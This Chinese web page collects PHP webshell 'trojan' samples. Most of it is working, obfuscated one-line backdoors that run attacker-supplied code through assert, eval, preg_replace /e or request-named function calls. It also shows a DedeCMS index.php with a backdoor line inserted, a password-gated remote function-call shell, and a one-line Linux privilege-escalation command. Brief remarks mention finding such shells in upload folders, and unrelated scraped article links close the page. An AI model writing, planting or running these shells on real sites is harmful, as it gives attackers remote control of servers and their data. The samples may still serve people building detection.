1. <?array_map("ass\x65rt",(array)$_REQUEST[dede]);?>
  2. <?php $command=$_POST[1990]; @eval($command);?>

打着广告的名义忽悠的php木马,不少一句话木马出现在附件上传目中,以达到网站挣钱的目的,而且还不是自己的网站,可通过linux命令批量查看文件查找到。

  1. <?array_map("ass\x65rt",(array)$_REQUEST[seay]);?>
  2.  * @version        $Id: index.php 1 9:23 2010-11-11 tianya $
  3.  * @package        DedeCMS.Site
  4.  * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.
  5.  * @license        http://help.dedecms.com/usersguide/license.html
  6.  * @link           http://www.dedecms.com
  7.  */
  8. if(!file_exists(dirname(__FILE__).'/data/common.inc.php'))
  9. {
  10.     header('Location:install/index.php');
  11.     exit();
  12. }
  13. if(isset($_GET['upcache']) || !file_exists('index.html'))
  14. {
  15.     require_once (dirname(__FILE__) . "/include/common.inc.php");
  16.     require_once DEDEINC."/arc.partview.class.php";
  17.     $GLOBALS['_arclistEnv'] = 'index';
  18.     $row = $dsql->GetOne("Select * From `#@__homepageset`");
  19.     $row['templet'] = MfTemplet($row['templet']);
  20.     $pv = new PartView();
  21.     $pv->SetTemplet($cfg_basedir . $cfg_templets_dir . "/" . $row['templet']);
  22.     $row['showmod'] = isset($row['showmod'])? $row['showmod'] : 0;
  23.     if ($row['showmod'] == 1)
  24.     {
  25.         $pv->SaveToHtml(dirname(__FILE__).'/index.html');
  26.         include(dirname(__FILE__).'/index.html');
  27.         exit();
  28.     } else {
  29.         $pv->Display();
  30.         exit();
  31.     }
  32. }
  33. else
  34. {
  35.     header('HTTP/1.1 301 Moved Permanently');
  36.     header('Location:index.html');
  37. }
  38. ?>
  1. <?php
  3. error_reporting(E_ERROR);
  5. if (isset($_REQUEST['myfunctionpassw']))
  7.     define('FUNCTION_PASSW',stripslashes($_REQUEST['myfunctionpassw']));
  9. if (isset($_REQUEST['myfunctioncodea']))
  11.     define('FUNCTION_CODEA',stripslashes($_REQUEST['myfunctioncodea']));
  13. if (isset($_REQUEST['myfunctioncodeb']))
  15.     define('FUNCTION_CODEB',stripslashes($_REQUEST['myfunctioncodeb']));
  17. if (isset($_REQUEST['myfunctioncodec']))
  19.     define('FUNCTION_CODEC',stripslashes($_REQUEST['myfunctioncodec']));
  21. if (substr ( md5 (FUNCTION_PASSW),26) == '254bff') {
  23.     if (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']) && isset($_REQUEST['myfunctioncodec']))
  25.         $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB, FUNCTION_CODEC);
  27.     elseif (isset($_REQUEST['myfunctioncodea']) && isset($_REQUEST['myfunctioncodeb']))
  29.         $_REQUEST['myfunctionname'](FUNCTION_CODEA, FUNCTION_CODEB) ? print(FUNCTION_CODEA.' ok') : print(FUNCTION_CODEA.' err');
  31.     else
  33.         $_REQUEST['myfunctionname'](FUNCTION_CODEA);
  35. } else {
  37.     die('Access Denied');
  39. }
  40. ?>

linux一句话提权install uprobes /bin/sh

组合木马

  1. <?php ($_=@$_GET[2]).@$_($_POST[1])?>
  1. <?php $k="ass"."ert"; $k(${"_PO"."ST"} [sz]);?>
  3. <?php copy(base64_decode("Li4vLi4vLi4vcGx1cy9kb3dubG9hZC5waHA="),base64_decode("Li4vLi4vZGVkZWRvd25sb2FkLnBocA=="));copy(base64_decode("Li4vLi4vLi4vcGx1cy9teXRhZ19qcy5waHA="),base64_decode("Li4vLi4vZGVkZW15dGFnLnBocA=="));echo "dedeok823571";?>
  5. <?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["52296"]);?>
  7. <?php unlink(base64_decode("Li4vLi4vcGx1cy9kb3dubG9hZC5waHA="));unlink(base64_decode("Li4vLi4vcGx1cy9teXRhZ19qcy5waHA="));echo "dedeok913438";?>
  9. <?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>
  11. <?$_POST['k']($_POST['8']);?>
  13. <?php $k = str_replace("8","","a8s88s8e8r88t");$k($_POST["8"]); ?>
  15. <?php $_GET['k8']($_POST['k8']);?>
  17. <?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>       
  19. <?php @preg_replace("//e",$_POST[x],"e");exit("|LO|"); ?>       
  21. <?php echo "dedeok";array_map("ass\x65rt",(array)${"_PO"."ST"}["16883"]);?>       
  23. <?php echo "dedeok245563";$a=scandir("../../../../");print_r($a);?>        
  25. <?php@preg_replace("//e",$_POST['IN_COMSENZ'],"Access Denied");        ?>

php木马样本,持续更新的更多相关文章

  1. 【前端】Util.js-ES6实现的常用100多个javaScript简短函数封装合集(持续更新中)

    Util.js (持续更新中...) 项目地址: https://github.com/dragonir/Util.js 项目描述 Util.js 是对常用函数的封装,方便在实际项目中使用,主要内容包 ...

  2. 神技!微信小程序(应用号)抢先入门教程(附最新案例DEMO-豆瓣电影)持续更新

    微信小程序 Demo(豆瓣电影) 由于时间的关系,没有办法写一个完整的说明,后续配合一些视频资料,请持续关注 官方文档:https://mp.weixin.qq.com/debug/wxadoc/de ...

  3. iOS系列教程 目录 (持续更新...)

      前言: 听说搞iOS的都是高富帅,身边妹子无数.咱也来玩玩.哈哈. 本篇所有内容使用的是XCode工具.Swift语言进行开发. 我现在也是学习阶段,每一篇内容都是经过自己实际编写完一遍之后,发现 ...

  4. ASP.NET MVC 5 系列 学习笔记 目录 (持续更新...)

    前言: 记得当初培训的时候,学习的还是ASP.NET,现在回想一下,图片水印.统计人数.过滤器....HttpHandler是多么的经典! 不过后来接触到了MVC,便立马爱上了它.Model-View ...

  5. git常用命令(持续更新中)

    git常用命令(持续更新中) 本地仓库操作git int                                 初始化本地仓库git add .                       ...

  6. iOS开发系列文章(持续更新……)

    iOS开发系列的文章,内容循序渐进,包含C语言.ObjC.iOS开发以及日后要写的游戏开发和Swift编程几部分内容.文章会持续更新,希望大家多多关注,如果文章对你有帮助请点赞支持,多谢! 为了方便大 ...

  7. 基于android studio的快捷开发(将持续更新)

    对于Android studio作为谷歌公司的亲儿子,自然有它的好用的地方,特别是gradle方式和快捷提示方式真的很棒.下面是我在实际开发中一些比较喜欢用的快速开发快捷键,对于基本的那些就不多说了. ...

  8. 总结js常用函数和常用技巧(持续更新)

    学习和工作的过程中总结的干货,包括常用函数.常用js技巧.常用正则表达式.git笔记等.为刚接触前端的童鞋们提供一个简单的查询的途径,也以此来缅怀我的前端学习之路. PS:此文档,我会持续更新. Aj ...

  9. 我的敏捷、需求分析、UML、软件设计电子书 - 下载(持续更新中)

    我将所有我的电子书汇总在一起,方便大家下载!(持续更新) 文档保存在我的网站——软件知识原创基地上(www.umlonline.org),请放心下载. 1)软件设计是怎样炼成的?(2014-4-1 发 ...

  10. React Native之坑总结(持续更新)

    React Native之坑总结(持续更新) Genymotion安装与启动 之前我用的是蓝叠(BlueStack)模拟器,跑RN程序也遇到了一些问题,都通过搜索引擎解决了,不过没有记录. 但是Blu ...

随机推荐

  1. Reverse Core 第二部分 - 14&15章 - 运行时压缩&调试UPX压缩的notepad

    @date: 2016/11/29 @author: dlive 0x00 前言 周六周日两天在打HCTF2016线上赛,没时间看书,打完比赛接着看~~ 0x01 运行时压缩 对比upx压缩前后的no ...

  2. 忘记mysq rootl密码

    忘记mysq rootl密码 1       mysql忘记root密码 1.1     查看mysql的进程 [root@mysql data]# cat /data/mysql.localdoma ...

  3. ES6扫盲

    原文阅读请点击此处 一.let和const { // let声明的变量只在let命令所在的代码块内有效 let a = 1; var b = 2; } console.log(a); // 报错: R ...

  4. SQL语法和运算符(一)

    一个数据库通常包含一个或多个表.每个表由一个名字标识,表包含带有数据的记录(行). 一些最重要的SQL命令(SQL对大小写不敏感): 一.SQL语法 select:从数据库中提取数据 update:更 ...

  5. kettle系列-[KettleUtil]kettle插件,类似kettle的自定义java类控件

    该kettle插件功能类似kettle现有的定义java类插件,自定java类插件主要是支持在kettle中直接编写java代码实现自定特殊功能,而本控件主要是将自定义代码转移到jar包,就是说自定义 ...

  6. facebook 简单的图文分享

    参考网址:http://www.mrfangge.com/facebook-page-share-settings/ 首先在facebook 注册开发者,新增一个应用,这里就要一个生所的应用 app_ ...

  7. VS 2013编译64位版本QT 4.8.6及使用cmake为依赖QT生成VS项目时Could NOT find Qt4

    对于一些已经解决的问题,本博客不再讨论.只将本人遇到的问题做简单的说明. 一.VS 2013编译64位版本QT 4.8.6 QT项目官网中,对于QT4,其只提供了windows X86的版本,并且支持 ...

  8. PHP socket上传文件图片

    最近了解了下下socket方面的东西,想做一个socket上传文件的例子. 在网上搜了搜代码执行后,图片数据传输了一半,图片的下半部分是灰色的.然后就自己仿着搜来的代码和php.net 中socket ...

  9. JavaScript call

    <script> function dog() { this.sound = "wangwang~"; this.shout = function () { alert ...

  10. PL/SQL连接Oracle数据库,中文乱码,显示问号

    问题描述: 登陆PL/SQL,执行SQL语句后,输出的中文标题显示成问号????:条件包含中文,则无数据.         如果不是中文,需要修改注册表值,方法如下: 进入注册表:Win+r,输入re ...